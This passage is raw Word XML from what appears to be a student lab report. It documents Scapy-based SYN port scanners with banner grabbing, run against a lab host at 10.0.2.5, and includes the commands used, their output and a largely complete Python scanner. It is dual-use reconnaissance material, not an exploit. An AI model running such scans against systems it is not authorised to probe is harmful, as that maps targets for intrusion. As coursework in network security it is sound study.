          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5327F6D2" w14:textId="0F46D893" w:rsidR="00180A80" w:rsidRDefault="004D7189" w:rsidP="00180A80">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3BB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Code Snippet </w:t>
      </w:r>
      <w:r w:rsidR="00180A80" w:rsidRPr="00180A80">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3: Basic SYN Scan (scan3.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630BEE0D" w14:textId="77777777" w:rsidR="00633EB0" w:rsidRPr="00180A80" w:rsidRDefault="00633EB0" w:rsidP="00180A80">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F34AFAE" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:r w:rsidRPr="00180A80">
        <w:t>Command Executed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6344746F" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00180A80">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00180A80">
        <w:t xml:space="preserve"> python scan3.py 10.0.2.5 10 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5433B870" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00180A80">
        <w:t>Code Explanation</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00180A80">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F379307" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00180A80">
        <w:t>This script performs a SYN scan by sending TCP packets with the SYN flag to the specified port range (10-100) on the target IP (10.0.2.5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7210546C" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00180A80">
        <w:t>Scapy’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00180A80">
        <w:t xml:space="preserve"> sr1 function is used to send packets and receive responses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7783AE1D" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00180A80">
        <w:t>Open ports are identified by SYN-ACK responses. Closed ports are counted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BB8A8B" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:r w:rsidRPr="00180A80">
        <w:t>Output Description:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BEC1A6" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00180A80">
        <w:t xml:space="preserve">Lists ports that are open (e.g., </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00180A80">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00180A80">
        <w:t xml:space="preserve">/21, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00180A80">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00180A80">
        <w:t xml:space="preserve">/22, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00180A80">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00180A80">
        <w:t xml:space="preserve">/23, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00180A80">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00180A80">
        <w:t>/25).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B17DE43" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00180A80">
        <w:t>Displays the total number of closed ports after the scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E19981" w14:textId="77777777" w:rsidR="00180A80" w:rsidRDefault="00180A80"/>
    <w:p w14:paraId="25C199A3" w14:textId="1C3A7F0E" w:rsidR="005D46D3" w:rsidRDefault="005D46D3" w:rsidP="004D7189">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005D46D3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B290E5C" wp14:editId="3B0C9C83">
            <wp:extent cx="4061735" cy="4284784"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="11191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1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539" cy="42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8D53" w14:textId="77777777" w:rsidR="00633EB0" w:rsidRDefault="00633EB0">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB4F9CC" w14:textId="6DDD1B70" w:rsidR="00180A80" w:rsidRDefault="004D7189" w:rsidP="00180A80">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B3BB1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Code Snippet </w:t>
      </w:r>
      <w:r w:rsidR="00180A80" w:rsidRPr="00180A80">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4: SYN Scan with Service Detection (scanner.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4A900C" w14:textId="77777777" w:rsidR="00633EB0" w:rsidRPr="00180A80" w:rsidRDefault="00633EB0" w:rsidP="00180A80">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CDFE944" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:r w:rsidRPr="00180A80">
        <w:t>Command Executed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7504AD97" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00180A80">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00180A80">
        <w:t xml:space="preserve"> python scanner.py 10.0.2.5 10 500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F847C88" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00180A80">
        <w:t>Code Explanation</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00180A80">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AA3EDB" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00180A80">
        <w:t>An extended SYN scan with service detection is performed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263A1C0C" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00180A80">
        <w:t>For open ports, a connection is made using the socket library to grab service banners.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E52AC96" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00180A80">
        <w:t>Unresponsive ports or those without banners are labeled as "Unknown version."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B3C11E" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00180A80">
        <w:t>Closed ports are counted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0498CD" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:r w:rsidRPr="00180A80">
        <w:t>Output Description:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E66E8CF" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00180A80">
        <w:t>Displays open ports along with service information (e.g., FTP, SSH, HTTP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFE1C19" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00180A80">
        <w:t>Includes banners such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B88CF30" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00180A80">
        <w:t>220 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00180A80">
        <w:t>vsFTPd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00180A80">
        <w:t xml:space="preserve"> 2.3.4) for FTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8131B0" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00180A80">
        <w:t>SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1 for SSH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795C1130" w14:textId="77777777" w:rsidR="00180A80" w:rsidRPr="00180A80" w:rsidRDefault="00180A80" w:rsidP="00180A80">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00180A80">
        <w:t>HTTP/1.1 200 OK for HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDF5ED6" w14:textId="3E8BF074" w:rsidR="00180A80" w:rsidRDefault="00180A80" w:rsidP="004D7189">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00180A80">
        <w:t>Shows the total number of closed ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0723678C" w14:textId="65E73888" w:rsidR="006A68C2" w:rsidRDefault="00682700" w:rsidP="004D7189">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00682700">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7270974A" wp14:editId="4C33CA15">
            <wp:extent cx="4922359" cy="3053862"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="107191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15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68" cy="30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8CE9" w14:textId="77777777" w:rsidR="00633EB0" w:rsidRDefault="00633EB0">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A4CFA1" w14:textId="77777777" w:rsidR="00633EB0" w:rsidRDefault="004D7189" w:rsidP="00633EB0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00633EB0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Code snippet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047AAF10" w14:textId="252398AC" w:rsidR="004D7189" w:rsidRPr="005B651E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br/>
      </w:r>
      <w:r w:rsidRPr="005B651E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5B651E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>scapy.all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B651E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719A9F3F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>import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DC3B0E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>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEBE5C4" w14:textId="0C4F5910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>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DA5AE8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>###### USAGE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42416099" w14:textId="56F190DD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###############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python scan4.py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i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portLo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portHi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="61239CDB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syn_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D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>target_i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D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>port_range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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E455E24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ctr =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0  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Counter for closed ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36396A17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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B5D2D7" w14:textId="72E1AE88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4D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"[+] Scanning started at",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time.ctime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cur_time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))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51666A2E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for port in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port_range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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61044C03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# Create SYN packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE4FF1B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syn_packet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IP(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dst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target_i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) / TCP(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dport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=port, </w:t>
      </w:r>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>flags</w:t>
      </w:r>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>="S")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781B9DD9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# Send SYN packet and wait for a response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110C3416" w14:textId="0CDC1A1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response = sr1(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syn_packet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, </w:t>
      </w:r>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>timeout</w:t>
      </w:r>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">=1, </w:t>
      </w:r>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>verbose</w:t>
      </w:r>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C36F3E1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# Analyze the response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0336C7F2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if response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A15425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response.haslayer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(TCP):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3326095A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response.getlayer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 xml:space="preserve">(TCP).flags ==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0x12:  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SYN-ACK flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B65FE8" w14:textId="410AAD78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print(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f"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tc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/{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">port} open", </w:t>
      </w:r>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>end</w:t>
      </w:r>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=" | ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8A1D39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# Perform basic banner grabbing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398FFAA9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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638FEEE6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    sock =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ocket.socket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socket.AF_INET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socket.SOCK_STREAM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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CCCEAA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ock.settimeout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(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032112D3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ock.connect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target_i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, port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DBCB92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ock.send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b"HEAD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/ HTTP/1.0\r\n\r\n")  # Generic request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591D6C3E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    banner =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ock.recv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 xml:space="preserve">(1024).decode('utf-8', </w:t>
      </w:r>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>errors</w:t>
      </w:r>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>='ignore').strip()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CE6CF3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ock.close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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02368BBC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    print(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banner.split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("\n")[0])  # Print the first line of the banner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019B5C87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except </w:t>
      </w:r>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Exception</w:t>
      </w:r>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7543D29C" w14:textId="023186BD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4D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Unknown version")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F39E36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# Send RST to close the connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E095B0E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rst_packet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IP(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dst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target_i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) / TCP(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dport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=port, </w:t>
      </w:r>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>flags</w:t>
      </w:r>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>="R")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F6EEF8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send(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rst_packet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, </w:t>
      </w:r>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>verbose</w:t>
      </w:r>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173A737E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response.getlayer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 xml:space="preserve">(TCP).flags ==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0x14:  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> RST flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386D629E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    ctr += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576D29EE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0178AA17" w14:textId="56246100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        print(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f"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tc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/{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>port}\t\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tfiltered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")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CD934D" w14:textId="52E6FAD4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End"/>
      <w:r w:rsidRPr="004D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>f"Closed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ports {ctr}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5498E320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>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084E253C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# Define target IP and port range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F723C6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if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ys.argv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) != 4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C242683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4D7189">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"Usage: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python scan4.py &lt;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target_i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&gt; &lt;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port_low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&gt; &lt;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port_high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&gt;")</w:t>
